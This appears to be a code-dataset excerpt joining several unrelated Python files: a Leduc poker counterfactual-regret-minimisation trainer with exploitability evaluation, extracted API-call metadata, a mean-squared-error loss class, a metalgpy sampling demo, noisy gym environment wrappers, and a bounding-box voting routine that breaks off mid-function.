>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrcQrrc", 0))
13
>>> int(LeducTrainer().Return_payoff_for_terminal_states("QKrrcQcc", 0))
5
"""
#round1 finish
if history.count("f") == self.NUM_PLAYERS -1 and self.card_num_check(history) == self.NUM_PLAYERS:
player_action_list = [[] for _ in range(self.NUM_PLAYERS)]
player_money_list_round1 = [1 for _ in range(self.NUM_PLAYERS)]
player_money_list_round2 = [0 for _ in range(self.NUM_PLAYERS)]
f_count, a_count, raise_count = 0, 0, 0
for hi in history[self.NUM_PLAYERS:]:
while len(player_action_list[(a_count + f_count)%self.NUM_PLAYERS])>=1 and player_action_list[(a_count + f_count)%self.NUM_PLAYERS][-1] == "f":
f_count += 1
player_action_list[(a_count + f_count)%self.NUM_PLAYERS].append(hi)
if hi == "c":
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] = max(player_money_list_round1)
elif hi == "r" and raise_count == 0:
raise_count += 1
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 2
elif hi == "r" and raise_count == 1:
player_money_list_round1[(a_count + f_count)%self.NUM_PLAYERS] += 4
a_count += 1
if len(player_action_list[target_player_i]) >= 1 and player_action_list[target_player_i][-1] == "f":
return -player_money_list_round1[target_player_i]
else:
return sum(player_money_list_round1) -player_money_list_round1[target_player_i]
#round2 finish
#target_player_i action history
player_action_list, player_money_list_round1, player_money_list_round2, community_card = self.action_history_player(history)
# target_player_i :fold
if player_action_list[target_player_i][-1] == "f":
return -player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i]
#周りがfold
last_play =[hi[-1] for idx, hi in enumerate(player_action_list) if idx != target_player_i]
if last_play.count("f") == self.NUM_PLAYERS - 1:
return sum(player_money_list_round1) + sum(player_money_list_round2) - player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i]
#show down
show_down_player =[idx for idx, hi in enumerate(player_action_list) if hi[-1] != "f"]
show_down_player_card = {}
for idx in show_down_player:
show_down_player_card[idx] = self.Rank(history[idx], community_card)
max_rank = max(show_down_player_card.values())
if show_down_player_card[target_player_i] != max_rank:
return - player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i]
else:
win_num = len([idx for idx, card_rank in show_down_player_card.items() if card_rank == max_rank])
return float((sum(player_money_list_round1) + sum(player_money_list_round2))/win_num) - player_money_list_round1[target_player_i] - player_money_list_round2[target_player_i]
# whetther terminal_states
def whether_terminal_states(self, history):
"""return string
>>> LeducTrainer().whether_terminal_states("JKccKr")
False
>>> LeducTrainer().whether_terminal_states("QJccJcc")
True
>>> LeducTrainer().whether_terminal_states("QQcr")
False
>>> LeducTrainer(num_players=3).whether_terminal_states("QKTrff")
True
>>> LeducTrainer(num_players=3).whether_terminal_states("KKTcccQcrcrcc")
True
"""
if history.count("f") == self.NUM_PLAYERS -1 :
return True
if self.card_num_check(history) == self.NUM_PLAYERS +1 :
private_cards, history_before, community_card, history_after = self.Split_history(history)
if history_after.count("r") == 0 and history_after.count("c") == self.NUM_PLAYERS:
return True
if history.count("r") >=1 :
idx = 0
for i,hi in enumerate(history_after):
if hi == "r":
idx = i
if history_after[idx+1:].count("c") == self.NUM_PLAYERS -1 :
return True
return False
def card_num_check(self, history):
"""return string
>>> LeducTrainer(num_players=3).card_num_check("JKTccc")
3
>>> LeducTrainer(num_players=2).card_num_check("KQcr")
2
"""
cards = self.card_distribution()
count = 0
for hi in history:
if hi in cards:
count += 1
return count
def whether_chance_node(self, history):
"""return string
>>> LeducTrainer().whether_chance_node("JKcc")
True
>>> LeducTrainer().whether_chance_node("KQcr")
False
>>> LeducTrainer().whether_chance_node("")
True
>>> LeducTrainer(num_players=3).whether_chance_node("KQTcc")
False
"""
if history == "":
return True
if self.card_num_check(history) == self.NUM_PLAYERS :
if history.count("r") == 0 and history.count("c") == self.NUM_PLAYERS:
return True
if history.count("r") >=1 :
idx = 0
for i,hi in enumerate(history):
if hi == "r":
idx = i
if history[idx+1:].count("c") == self.NUM_PLAYERS -1 :
return True
return False
#make node or get node
def Get_information_set_node_or_create_it_if_nonexistant(self, infoSet):
node = self.nodeMap.get(infoSet)
if node == None:
node = Node(self.NUM_ACTIONS, infoSet, self.NUM_PLAYERS)
self.nodeMap[infoSet] = node
return node
#chance sampling CFR
def chance_sampling_CFR(self, history, target_player_i, iteration_t, p_list):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, target_player_i)
elif self.whether_chance_node(history):
if len(history) == 0:
self.cards = self.card_distribution()
random.shuffle(self.cards)
nextHistory = "".join(self.cards[:self.NUM_PLAYERS])
return self.chance_sampling_CFR(nextHistory, target_player_i, iteration_t, p_list)
else:
nextHistory = history + self.cards[self.NUM_PLAYERS]
return self.chance_sampling_CFR(nextHistory, target_player_i, iteration_t, p_list)
infoSet = history[player] + history[self.NUM_PLAYERS:]
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
util_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
nodeUtil = 0
node.Get_strategy_through_regret_matching()
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
p_change[player] = node.strategy[ai]
util_list[ai] = self.chance_sampling_CFR(nextHistory, target_player_i, iteration_t, p_list * p_change)
nodeUtil += node.strategy[ai] * util_list[ai]
if player == target_player_i:
for ai in node.possible_action:
regret = util_list[ai] - nodeUtil
p_exclude = 1
for idx in range(self.NUM_PLAYERS):
if idx != player:
p_exclude *= p_list[idx]
node.regretSum[ai] += p_exclude * regret
node.strategySum[ai] += node.strategy[ai] * p_list[player]
return nodeUtil
#chance sampling CFR
def vanilla_CFR(self, history, target_player_i, iteration_t, p_list):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, target_player_i)
elif self.whether_chance_node(history):
if len(history) == 0:
cards = self.card_distribution()
cards_candicates = [cards_candicate for cards_candicate in itertools.permutations(cards, self.NUM_PLAYERS+1)]
utility_sum = 0
for cards_i in cards_candicates:
self.cards_i = cards_i
nextHistory = "".join(cards_i[:self.NUM_PLAYERS])
utility_sum += (1/len(cards_candicates))* self.vanilla_CFR(nextHistory, target_player_i, iteration_t, p_list)
return utility_sum
else:
nextHistory = history + self.cards_i[self.NUM_PLAYERS]
return self.vanilla_CFR(nextHistory, target_player_i, iteration_t, p_list)
infoSet = history[player] + history[self.NUM_PLAYERS:]
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
node.Get_strategy_through_regret_matching()
util_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
nodeUtil = 0
if not self.eval:
strategy = node.strategy
else:
strategy = node.Get_average_information_set_mixed_strategy()
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
p_change[player] = strategy[ai]
util_list[ai] = self.vanilla_CFR(nextHistory, target_player_i, iteration_t, p_list * p_change)
nodeUtil += strategy[ai] * util_list[ai]
if (not self.eval) and player == target_player_i:
for ai in node.possible_action:
regret = util_list[ai] - nodeUtil
p_exclude = 1
for idx in range(self.NUM_PLAYERS):
if idx != player:
p_exclude *= p_list[idx]
node.regretSum[ai] += p_exclude * regret
node.strategySum[ai] += strategy[ai] * p_list[player]
return nodeUtil
#external sampling MCCFR
def external_sampling_MCCFR(self, history, target_player_i):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, target_player_i)
elif self.whether_chance_node(history):
if len(history) == 0:
self.cards = self.card_distribution()
random.shuffle(self.cards)
nextHistory = "".join(self.cards[:self.NUM_PLAYERS])
return self.external_sampling_MCCFR(nextHistory, target_player_i)
else:
nextHistory = history + self.cards[self.NUM_PLAYERS]
return self.external_sampling_MCCFR(nextHistory, target_player_i)
infoSet = history[player] + history[self.NUM_PLAYERS:]
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
node.Get_strategy_through_regret_matching()
if player == target_player_i:
util_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
nodeUtil = 0
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
util_list[ai] = self.external_sampling_MCCFR(nextHistory, target_player_i)
nodeUtil += node.strategy[ai] * util_list[ai]
for ai in node.possible_action:
regret = util_list[ai] - nodeUtil
node.regretSum[ai] += regret
else:
sampling_action = np.random.choice(list(range(self.NUM_ACTIONS)), p= node.strategy)
nextHistory = history + self.ACTION_DICT[sampling_action]
nodeUtil= self.external_sampling_MCCFR(nextHistory, target_player_i)
for ai in node.possible_action:
node.strategySum[ai] += node.strategy[ai]
return nodeUtil
#outcome sampling MCCFR
def outcome_sampling_MCCFR(self, history, target_player_i, iteration_t, p_list,s):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, target_player_i) / s, 1
elif self.whether_chance_node(history):
if len(history) == 0:
self.cards = self.card_distribution()
random.shuffle(self.cards)
nextHistory = "".join(self.cards[:self.NUM_PLAYERS])
return self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list, s)
else:
nextHistory = history + self.cards[self.NUM_PLAYERS]
return self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list, s)
infoSet = history[player] + history[self.NUM_PLAYERS:]
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
node.Get_strategy_through_regret_matching()
probability = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
if player == target_player_i:
for ai in node.possible_action:
probability[ai] = self.epsilon/len(node.possible_action)+ (1-self.epsilon)* node.strategy[ai]
else:
for ai in node.possible_action:
probability[ai] = node.strategy[ai]
sampling_action = np.random.choice(list(range(self.NUM_ACTIONS)), p=probability)
nextHistory = history + self.ACTION_DICT[sampling_action]
if player == target_player_i:
p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
p_change[player] = node.strategy[sampling_action]
util, p_tail = self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list*p_change, s*probability[sampling_action])
p_exclude = 1
for idx in range(self.NUM_PLAYERS):
if idx != player:
p_exclude *= p_list[idx]
w = util * p_exclude
for ai in node.possible_action:
if sampling_action == ai:
regret = w*(1- node.strategy[sampling_action])*p_tail
else:
regret = -w*p_tail * node.strategy[sampling_action]
node.regretSum[ai] += regret
else:
p_change = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
for idx in range(self.NUM_PLAYERS):
if idx!= player:
p_change[idx] = node.strategy[sampling_action]
util, p_tail = self.outcome_sampling_MCCFR(nextHistory, target_player_i, iteration_t, p_list*p_change, s*probability[sampling_action])
p_exclude = 1
for idx in range(self.NUM_PLAYERS):
if idx != player:
p_exclude *= p_list[idx]
for ai in node.possible_action:
node.strategySum[ai] += (iteration_t - node.c)*p_exclude*node.strategy[ai]
node.c = iteration_t
#node.strategySum[ai] += (p1/s)*node.strategy[ai]
return util, p_tail*node.strategy[sampling_action]
#KuhnTrainer main method
def train(self, method):
self.exploitability_list = {}
for iteration_t in tqdm(range(int(self.train_iterations))):
for target_player_i in range(self.NUM_PLAYERS):
p_list = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
if method == "vanilla_CFR":
self.vanilla_CFR("", target_player_i, iteration_t, p_list)
elif method == "chance_sampling_CFR":
self.chance_sampling_CFR("", target_player_i, iteration_t, p_list)
elif method == "external_sampling_MCCFR":
self.external_sampling_MCCFR("", target_player_i)
elif method == "outcome_sampling_MCCFR":
self.epsilon = 0.6
self.outcome_sampling_MCCFR("", target_player_i, iteration_t, p_list, 1)
#calculate expolitability
if iteration_t in [int(j)-1 for j in np.logspace(1, len(str(self.train_iterations))-1, (len(str(self.train_iterations))-1)*3)] :
self.exploitability_list[iteration_t] = self.get_exploitability_dfs()
if wandb_save:
wandb.log({'iteration': iteration_t, 'exploitability': self.exploitability_list[iteration_t]})
self.show_plot(method)
def show_plot(self, method):
plt.scatter(list(self.exploitability_list.keys()), list(self.exploitability_list.values()), label=method)
plt.plot(list(self.exploitability_list.keys()), list(self.exploitability_list.values()))
plt.xscale('log')
plt.yscale('log')
plt.xlabel("iterations")
plt.ylabel("exploitability")
plt.legend(loc = "lower left")
if wandb_save:
wandb.save()
# evaluate average strategy
def eval_strategy(self, target_player_i):
self.eval = True
p_list = np.array([1 for _ in range(self.NUM_PLAYERS)], dtype=float)
average_utility = self.vanilla_CFR("", target_player_i, 0, p_list)
self.eval = False
return average_utility
def calc_best_response_value(self, best_response_strategy, best_response_player, history, prob):
if self.card_num_check(history) == self.NUM_PLAYERS + 1:
private_cards, history_before, community_card, history_after = self.Split_history(history)
player = self.action_player(history)
if self.whether_terminal_states(history):
return self.Return_payoff_for_terminal_states(history, best_response_player)
elif self.whether_chance_node(history):
if len(history) == 0:
cards = self.card_distribution()
cards_candicates = [cards_candicate for cards_candicate in itertools.permutations(cards, self.NUM_PLAYERS)]
utility_sum = 0
for cards_i in cards_candicates:
nextHistory = "".join(cards_i[:self.NUM_PLAYERS])
utility = (1/len(cards_candicates))* self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob)
utility_sum += utility
return utility_sum
else:
com_cards = self.card_distribution()
com_cards.remove(history[0])
com_cards.remove(history[1])
utility_sum_round2 = 0
for com_cards_i in com_cards:
nextHistory = history + com_cards_i
utility_sum_round2 += (1/len(com_cards))*self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob)
return utility_sum_round2
infoSet = history[player] + history[self.NUM_PLAYERS:]
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
if player == best_response_player:
if infoSet not in best_response_strategy:
action_value = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
br_value = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
for assume_history, po_ in self.infoSets_dict[infoSet].items():
for ai in node.possible_action:
nextHistory = assume_history + self.ACTION_DICT[ai]
br_value[ai] = self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, po_)
action_value[ai] += br_value[ai] * po_
#br_action = 0 ← action 0 を全てのノードで選択できるわけではないため不適切
br_action = node.possible_action[0]
for ai in node.possible_action:
if action_value[ai] > action_value[br_action]:
br_action = ai
best_response_strategy[infoSet] = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
best_response_strategy[infoSet][br_action] = 1.0
node_util = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
node_util[ai] = self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob)
best_response_util = 0
for ai in node.possible_action:
best_response_util += node_util[ai] * best_response_strategy[infoSet][ai]
return best_response_util
else:
avg_strategy = node.Get_average_information_set_mixed_strategy()
nodeUtil = 0
action_value_list = np.array([0 for _ in range(self.NUM_ACTIONS)], dtype=float)
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
action_value_list[ai] = self.calc_best_response_value(best_response_strategy, best_response_player, nextHistory, prob*avg_strategy[ai])
nodeUtil += avg_strategy[ai] * action_value_list[ai]
return nodeUtil
def create_infoSets(self, history, target_player, po):
player = self.action_player(history)
if self.whether_terminal_states(history):
return
elif self.whether_chance_node(history):
#round1
if len(history) == 0:
cards = self.card_distribution()
cards_candicates = [cards_candicate for cards_candicate in itertools.permutations(cards, self.NUM_PLAYERS)]
for cards_candicates_i in cards_candicates:
nextHistory = "".join(cards_candicates_i[:self.NUM_PLAYERS])
self.create_infoSets(nextHistory, target_player, po*(1/len(cards_candicates)))
return
#round2
else:
com_cards_candicates = self.card_distribution()
for player_i in range(self.NUM_PLAYERS):
com_cards_candicates.remove(history[player_i])
for com_cards_i in com_cards_candicates:
nextHistory = history + com_cards_i
self.create_infoSets(nextHistory, target_player, po*(1/len(com_cards_candicates)))
return
infoSet = history[player] + history[self.NUM_PLAYERS:]
if player == target_player:
if self.infoSets_dict.get(infoSet) is None:
self.infoSets_dict[infoSet] = defaultdict(int)
self.infoSets_dict[infoSet][history] += po
node = self.Get_information_set_node_or_create_it_if_nonexistant(infoSet)
for ai in node.possible_action:
nextHistory = history + self.ACTION_DICT[ai]
if player == target_player:
self.create_infoSets(nextHistory, target_player, po)
else:
actionProb = node.Get_average_information_set_mixed_strategy()[ai]
self.create_infoSets(nextHistory, target_player, po*actionProb)
def get_exploitability_dfs(self):
# 各information setを作成 & reach_probabilityを計算
self.infoSets_dict = {}
for target_player in range(self.NUM_PLAYERS):
self.create_infoSets("", target_player, 1.0)
exploitability = 0
best_response_strategy = {}
for best_response_player_i in range(self.NUM_PLAYERS):
exploitability += self.calc_best_response_value(best_response_strategy, best_response_player_i, "", 1)
assert exploitability >= 0
return exploitability
#config
algorithm_candicates = ["vanilla_CFR", "chance_sampling_CFR", "external_sampling_MCCFR", "outcome_sampling_MCCFR"]
algo = algorithm_candicates[1]
train_iterations = 10**5
num_players = 2
wandb_save = True
if wandb_save:
wandb.init(project="Leduc_Poker_{}players".format(num_players), name="cfr_{}".format(algo))
#train
leduc_trainer = LeducTrainer(train_iterations=train_iterations, num_players=num_players)
leduc_trainer.train(algo)
print("avg util:", leduc_trainer.eval_strategy(0))
pd.set_option('display.max_rows', None)
result_dict = {}
for key, value in sorted(leduc_trainer.nodeMap.items()):
result_dict[key] = value.Get_average_information_set_mixed_strategy()
df = pd.DataFrame(result_dict.values(), index=result_dict.keys(), columns=["Fold", "Call", "Raise"])
df.index.name = "Node"
print(df)
# calculate random strategy_profile exploitability
for i in range(2,3):
kuhn_poker_agent = LeducTrainer(train_iterations=0, num_players=i)
print("{}player game:".format(i), kuhn_poker_agent.get_exploitability_dfs())
doctest.testmod()
|
[
"matplotlib.pyplot.xscale",
"wandb.log",
"matplotlib.pyplot.yscale",
"random.shuffle",
"matplotlib.pyplot.legend",
"itertools.permutations",
"collections.defaultdict",
"numpy.array",
"wandb.save",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"pandas.set_option",
"doctest.testmod"
] |
[((32412, 32451), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', 'None'], {}), "('display.max_rows', None)\n", (32425, 32451), True, 'import pandas as pd\n'), ((32957, 32974), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (32972, 32974), False, 'import doctest\n'), ((3162, 3179), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3173, 3179), False, 'from collections import defaultdict\n'), ((25608, 25625), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""log"""'], {}), "('log')\n", (25618, 25625), True, 'import matplotlib.pyplot as plt\n'), ((25630, 25647), 'matplotlib.pyplot.yscale', 'plt.yscale', (['"""log"""'], {}), "('log')\n", (25640, 25647), True, 'import matplotlib.pyplot as plt\n'), ((25652, 25676), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""iterations"""'], {}), "('iterations')\n", (25662, 25676), True, 'import matplotlib.pyplot as plt\n'), ((25681, 25709), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""exploitability"""'], {}), "('exploitability')\n", (25691, 25709), True, 'import matplotlib.pyplot as plt\n'), ((25714, 25742), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""lower left"""'}), "(loc='lower left')\n", (25724, 25742), True, 'import matplotlib.pyplot as plt\n'), ((1690, 1717), 'numpy.array', 'np.array', (['[1, 2]'], {'dtype': 'int'}), '([1, 2], dtype=int)\n', (1698, 1717), True, 'import numpy as np\n'), ((25770, 25782), 'wandb.save', 'wandb.save', ([], {}), '()\n', (25780, 25782), False, 'import wandb\n'), ((1782, 1812), 'numpy.array', 'np.array', (['[0, 1, 2]'], {'dtype': 'int'}), '([0, 1, 2], dtype=int)\n', (1790, 1812), True, 'import numpy as np\n'), ((30920, 30936), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (30931, 30936), False, 'from collections import defaultdict\n'), ((1876, 1903), 'numpy.array', 'np.array', (['[0, 1]'], {'dtype': 'int'}), '([0, 1], dtype=int)\n', (1884, 1903), True, 'import numpy as np\n'), ((15494, 15520), 'random.shuffle', 'random.shuffle', (['self.cards'], {}), '(self.cards)\n', (15508, 15520), False, 'import random\n'), ((19712, 19738), 'random.shuffle', 'random.shuffle', (['self.cards'], {}), '(self.cards)\n', (19726, 19738), False, 'import random\n'), ((21644, 21670), 'random.shuffle', 'random.shuffle', (['self.cards'], {}), '(self.cards)\n', (21658, 21670), False, 'import random\n'), ((25244, 25343), 'wandb.log', 'wandb.log', (["{'iteration': iteration_t, 'exploitability': self.exploitability_list[\n iteration_t]}"], {}), "({'iteration': iteration_t, 'exploitability': self.\n exploitability_list[iteration_t]})\n", (25253, 25343), False, 'import wandb\n'), ((17475, 17526), 'itertools.permutations', 'itertools.permutations', (['cards', '(self.NUM_PLAYERS + 1)'], {}), '(cards, self.NUM_PLAYERS + 1)\n', (17497, 17526), False, 'import itertools\n'), ((26703, 26750), 'itertools.permutations', 'itertools.permutations', (['cards', 'self.NUM_PLAYERS'], {}), '(cards, self.NUM_PLAYERS)\n', (26725, 26750), False, 'import itertools\n'), ((30070, 30117), 'itertools.permutations', 'itertools.permutations', (['cards', 'self.NUM_PLAYERS'], {}), '(cards, self.NUM_PLAYERS)\n', (30092, 30117), False, 'import itertools\n')]
|
import numpy as np
class LossFunction:
@staticmethod
def calculate_cost(expected_value, predicted):
raise NotImplementedError("Should have implemented this!")
@staticmethod
def calculate_cost_gradient(expected_value, outputs, derivative_outputs):
raise NotImplementedError("Should have implemented this!")
class MeanSquaredError(LossFunction):
@staticmethod
def calculate_cost(expected_value, outputs):
return 0.5 * np.power(np.linalg.norm(expected_value - outputs), 2)
@staticmethod
def calculate_cost_gradient(expected_value, outputs, derivative_outputs):
return (outputs - expected_value) * derivative_outputs
|
[
"numpy.linalg.norm"
] |
[((478, 518), 'numpy.linalg.norm', 'np.linalg.norm', (['(expected_value - outputs)'], {}), '(expected_value - outputs)\n', (492, 518), True, 'import numpy as np\n')]
|
from dataclasses import dataclass
@dataclass
class Pool:
param1: int
@dataclass
class HEPnOS:
pools: list
# metalgpy
import numpy as np
import metalgpy as mpy
rng = np.random.RandomState(42)
Pool_ = mpy.meta(Pool)
HEPnOS_ = mpy.meta(HEPnOS)
max_pools = 5
num_pools = mpy.Int(1, max_pools)
pools = mpy.List([Pool_(param1=mpy.Int(0, 10)) for i in range(max_pools)], k=num_pools, invariant=True, name="pools")
hepnos_app = HEPnOS_(pools)
for sample_values, sample_app in mpy.sample(hepnos_app, size=2, rng=rng, deepcopy=True):
instance = sample_app.evaluate()
print(f"Frozen Program: {sample_app}")
print(f"Program evaluation: {instance}")
print()
|
[
"metalgpy.Int",
"metalgpy.sample",
"numpy.random.RandomState",
"metalgpy.meta"
] |
[((179, 204), 'numpy.random.RandomState', 'np.random.RandomState', (['(42)'], {}), '(42)\n', (200, 204), True, 'import numpy as np\n'), ((214, 228), 'metalgpy.meta', 'mpy.meta', (['Pool'], {}), '(Pool)\n', (222, 228), True, 'import metalgpy as mpy\n'), ((239, 255), 'metalgpy.meta', 'mpy.meta', (['HEPnOS'], {}), '(HEPnOS)\n', (247, 255), True, 'import metalgpy as mpy\n'), ((284, 305), 'metalgpy.Int', 'mpy.Int', (['(1)', 'max_pools'], {}), '(1, max_pools)\n', (291, 305), True, 'import metalgpy as mpy\n'), ((486, 540), 'metalgpy.sample', 'mpy.sample', (['hepnos_app'], {'size': '(2)', 'rng': 'rng', 'deepcopy': '(True)'}), '(hepnos_app, size=2, rng=rng, deepcopy=True)\n', (496, 540), True, 'import metalgpy as mpy\n'), ((337, 351), 'metalgpy.Int', 'mpy.Int', (['(0)', '(10)'], {}), '(0, 10)\n', (344, 351), True, 'import metalgpy as mpy\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "<NAME>"
import gym
import numpy
from gym.spaces.box import Box
__all__ = ["NoisyObservationWrapper", "NoisyActionWrapper"]
class NoisyObservationWrapper(gym.ObservationWrapper):
"""Make observation dynamic by adding noise"""
def __init__(self, env: gym.Env = None, percent_pad=5, bottom_margin: int = 20):
"""
# doom 20px bottom is useless
:param env:
:param percent_pad:
:param bottom_margin:"""
super().__init__(env)
self.original_shape = env.space.shape
new_side = int(round(max(self.original_shape[:-1]) * 100.0 / (100.0 - percent_pad)))
self.new_shape = [new_side, new_side, 3]
self.observation_space = Box(0.0, 255.0, self.new_shape)
self.bottom_margin = bottom_margin
self.ob = None
def _observation(self, obs: numpy.ndarray) -> numpy.ndarray:
im_noise = numpy.random.randint(0, 256, self.new_shape).astype(obs.dtype)
im_noise[: self.original_shape[0] - self.bottom_margin, : self.original_shape[1], :] = obs[
: -self.bottom_margin, :, :
]
self.ob = im_noise
return im_noise
# def render(self, mode='human', close=False):
# temp = self.env.render(mode, close)
# return self.ob
class NoisyActionWrapper(gym.ActionWrapper):
"""
TODO: finish
Make action dynamic by adding noise"""
def __init__(self, env: gym.Env = None, percent_pad=5, bottom_margin: int = 20):
super().__init__(env)
self.original_shape = env.space.shape
new_side = int(round(max(self.original_shape[:-1]) * 100.0 / (100.0 - percent_pad)))
self.new_shape = [new_side, new_side, 3]
self.action_space = Box(0.0, 255.0, self.new_shape)
self.bottom_margin = bottom_margin
self.ob = None
def _action(self, obs: numpy.ndarray) -> numpy.ndarray:
im_noise = numpy.random.randint(0, 256, self.new_shape).astype(obs.dtype)
im_noise[: self.original_shape[0] - self.bottom_margin, : self.original_shape[1], :] = obs[
: -self.bottom_margin, :, :
]
self.ob = im_noise
return im_noise
# def render(self, mode='human', close=False):
# temp = self.env.render(mode, close)
# return self.ob
|
[
"gym.spaces.box.Box",
"numpy.random.randint"
] |
[((763, 794), 'gym.spaces.box.Box', 'Box', (['(0.0)', '(255.0)', 'self.new_shape'], {}), '(0.0, 255.0, self.new_shape)\n', (766, 794), False, 'from gym.spaces.box import Box\n'), ((1780, 1811), 'gym.spaces.box.Box', 'Box', (['(0.0)', '(255.0)', 'self.new_shape'], {}), '(0.0, 255.0, self.new_shape)\n', (1783, 1811), False, 'from gym.spaces.box import Box\n'), ((946, 990), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(256)', 'self.new_shape'], {}), '(0, 256, self.new_shape)\n', (966, 990), False, 'import numpy\n'), ((1958, 2002), 'numpy.random.randint', 'numpy.random.randint', (['(0)', '(256)', 'self.new_shape'], {}), '(0, 256, self.new_shape)\n', (1978, 2002), False, 'import numpy\n')]
|
import numpy as np
DEBUG = True
def py_box_voting_wrapper(IOU_thresh, score_thresh, with_nms):
if with_nms:
def _box_voting(nms_dets, dets):
return box_voting_nms(nms_dets, dets, IOU_thresh, score_thresh)
else:
def _box_voting(dets):
return box_voting(dets, IOU_thresh, score_thresh)
return _box_voting
def box_voting_nms(nms_dets, dets, IOU_thresh, score_thresh):
"""
greedily select boxes with high confidence and overlap with current maximum
and voting the final box coordinates by fusing those boxes
:param num_dets: dets after nms
:param dets: original detection results, dets before nms. [[x1, y1, x2, y2 score]]
:param IOU_thresh: retain overlap > IOU_thresh for fusion
:param score_thresh: retain score > score_thresh for fusion
:return: detection coordinates to keep
"""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
if DEBUG:
print("dets ordered:", dets[order])
keep_fusion_boxes = []
for idx, nms_det in enumerate(nms_dets):
area_nms_det = (nms_det[2] - nms_det[0] + 1) * (nms_det[3] - nms_det[1] + 1)
xx1 = np.maximum(nms_det[0], x1[order])
yy1 = np.maximum(nms_det[1], y1[order])
xx2 = np.minimum(nms_det[2], x2[order])
yy2 = np.minimum(nms_det[3], y2[order])
# compute overlap
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (area_nms_det + areas[order] - inter)
# retain boxes with large overlap and high confidence for fusion
IOU_inds_keep = np.where(ovr > IOU_thresh)[0]
scores_inds_keep = np.where(scores[order] > score_thresh)[0]
if DEBUG:
print("IOU_inds_keep:", IOU_inds_keep)
print("scores_inds_keep:", scores_inds_keep)
inds_fusion = np.intersect1d(IOU_inds_keep, scores_inds_keep)
if inds_fusion.size == 0: # if no box retained, keep the original one
keep_fusion_boxes.append(nms_det)
if DEBUG:
print("inds_fusion:", inds_fusion)
print("keep nms_det")
continue
if DEBUG:
if inds_fusion.size>1:
print("boxes for fusion:", inds_fusion)
print(dets[order[inds_fusion]])
x1_fusion = x1[order[inds_fusion]]
y1_fusion = y1[order[inds_fusion]]
x2_fusion = x2[order[inds_fusion]]
y2_fusion = y2[order[inds_fusion]]
scores_fusion = scores[order[inds_fusion]]
fusion_box = np.zeros((5))
fusion_box[0] = np.sum(x1_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[1] = np.sum(y1_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[2] = np.sum(x2_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[3] = np.sum(y2_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[4] = scores_fusion[0]
if DEBUG:
print("fusion_box:", fusion_box)
keep_fusion_boxes.append(fusion_box)
# boxes with small overlap are kept for another loop
